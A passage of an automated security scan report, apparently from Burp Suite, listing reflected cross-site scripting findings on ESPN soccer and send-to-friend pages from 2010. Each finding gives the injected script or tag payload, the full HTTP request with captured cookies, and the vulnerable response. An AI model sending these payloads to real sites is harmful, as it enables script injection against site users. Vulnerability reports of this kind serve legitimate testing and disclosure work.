The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bae5<script>alert(1)</script>2f2d8562032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn</BODY></HTML>
5.54. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/world-cup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 12:56:45 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com; Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT Content-Length: 71086 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.55. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/worldcup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=120 Date: Sat, 06 Nov 2010 23:04:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT Content-Length: 71086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT Content-Length: 81049 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit"> ...[SNIP]...
5.57. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/162/italy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT Content-Length: 81157 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT Content-Length: 80715 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/164/spain
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:16 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT Content-Length: 80823 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT Content-Length: 81978 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue"> ...[SNIP]...
5.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/202/argentina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT Content-Length: 82086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
